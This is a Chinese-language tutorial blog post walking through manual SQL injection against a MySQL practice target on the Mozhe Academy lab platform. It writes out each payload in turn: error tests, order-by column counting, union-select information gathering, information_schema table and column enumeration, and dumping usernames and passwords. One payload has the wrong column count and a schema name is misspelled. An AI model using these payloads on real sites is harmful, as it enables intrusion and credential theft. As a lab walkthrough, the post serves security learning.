实战感受SQL注入（手工注入）

创始人

2025-05-30 11:58:48

0次

前言

在上篇文章中我们介绍了SQL注入漏洞，并且用简单的php代码，介绍了SQL注入漏洞可能出现的情况和原理。这篇文章就让我们通过实战来感受一下SQL注入。

实战感受SQL注入

墨者学院手工SQL注入

点击WEB安全，点击SQL注入

在这里插入图片描述

我们使用墨者学院的SQL手工注入漏洞测试（MySQL数据库），点击启动靶场环境

访问下方给的IP和端口，或点击 [点击访问]

点击关于平台停机维护

跳转页面后，我们看地址栏中又?id，该处通过GET参数传递

我们在此处可以使用让其出错的方式验证，尝试验证此处参数是否传入后台，并代入数据库查询

在?id=1后面输入 and 1=2

发现页面显示出错，说明此处的参数是有被传入后台并且代入数据库查询

在上篇文章中我们说过不仅可以使用 and 1=2的方式来检测，只要让其出错即可，所以我们在?id=1后面随便输入sdagwogsosn也是ok的
- 详细请参见上篇文章：SQL注入简介及原理

在SQL注入中很经常使用union查询来查询我们想要的信息，但是基于数据库的只是，我们知道当我们使用SQL语句进行查询的时候需要知道有几个字段。

但问题是我们此时进行的是黑盒测试，也就是我们并不知道数据库的结构是什么样子的，那么此时我们该怎么办呢？

在SQL注入中很经常使用order by猜测有几个字段

order by [n]
- order by 1
- order by 2
- …
直到页面回显不正常，此时我们就能够得知有n-1个字段

我们回到实战中，我们在?id后面输入 order by 4

发现页面是正常回显，再次在?id后面输入 order by 5

此时发现页面回显不正常，说明字段数就为5-1=4个

当我们知道了字段数之后就可以使用联合查询(union)

由于我们已经知道了有四个字段，所以直接就可以在?id=1后面加上 union select 1,2,3,4

我们猜测他在代码中所写的语句应该是如下：

$id = $_GET["id"];
$sql = "select [四个字段] from [表] where id=$id";

这里的$id就是我们通过GET方式传入的参数

如果当我们传入?id=1 union select 1,2,3,4完整的SQL语句为：select [四个字段] from [表] where id=1 union select 1,2,3,4

发现页面回显正常，紧接着我们使union前的语句为假

可以改变id=-1
也可以在id=1后面加上and 1=2
这里我使用id=-1的方式

我们发现页面回显了2和3。我们可以在union语句后的2和3处填入我们想要查询的信息

version()：数据库版本
database()：数据库的名字
user()：数据库的用户
@@version_compile_os：操作系统

将2和3的位置上填入version()和database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hdfoAM4f-1679114292375)(null)]

发现返回了数据库版本和数据库的名称

再在2和3的输入user()和@@version_compile_os

得到信息：

数据库版本：5.7.22-0ubuntu0.16.04.1
数据库名：mozhe_Discuz_StormGroup
操作系统：Linux
数据库的用户名：root@localhost

当我们拿到这些信息之后可以有进一步的操作，我们可以通过拿到的数据库名进行查看该数据库下的表名

在MySQL中有一些MySQL自带的表，这些表中储存了数据库的一些信息
information_shchema中的tables中储存了数据库中的各个表名，并且其存储表名的列名为table_name

我们可以在?id=-1后面输入union select 1,table_name,3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

被代入SQL语句为：select table_name from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

在这里插入图片描述

页面中返回了表名，这里只能输出了一个表名，但是不代表这个数据库下只有一张表

我们可以使用group_concat()让其输出所有的表名

在?id=-1后面输入union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

SQL语句为：select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

我们发现将该数据库下的表名都输出了

StormGroup_member
notice

当我们使用SQL语句进行查询的时候，需要知道表名外还需要知道列名，举个很简单的例子

select username from user
上面的SQL语句中我们需要知道user这个表名，此外我们还需要知道username这个列名

所以当我们拿到表名之后，紧接着我们就需要知道列名，才能查询到我们想要的信息

information_shcema中的columns存储了各个表中的列名，并且其存储列名的列名为column_name

回顾刚才我们查找到的数据库名，根据数据库名的意思我们发现StormGroup_member存放的应该是用户的信息，更具有价值所以我们优先查询StormGroup_member下的列名信息

在?id=-1后面输入union select 1,column_name,3,4 from information_schema.columns where table_name = 'StormGroup_member'

SQL语句为：select column_name from information_schema.columns where table_name = 'StormGroup_member'

我们发现其也只输出了一个列名，所以我们依然可以使用group_concat()让其输出所有的列名

在?id=-1后面输入union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'StormGroup_member'

SQL语句为：select group_concat(column_name) from information_schema.columns where table_name = 'StormGroup_member'

页面回显除了StormGroup_member表下所有的列名

到此我们就可以使用这些列名查询相关的信息了，我们查询name和password

在?id=-1后面输入union select 1,group_concat(name),group_concat(password) from StormGroup_member

我们知道group_concat()是用来输出所有的数据的，同样我们们也可以使用limit
- union select 1,name,password,4 from StormGroup_member limit 0,1
  - 0代表从第一个开始
  - 1代表输出一个
- union select 1,name,password,4 from StormGroup_member limit 1,1
  - 1代表从第二个开始
  - 1代表输出一个
- union select 1,name,password,4 from StormGroup_member limit 2,1
  - 2代表从第三个开始
  - 1代表输出一个
- …
- 直到返回异常则表示，没有数据了（到底了）也就是没有数据了
通过此方法也可以输出数据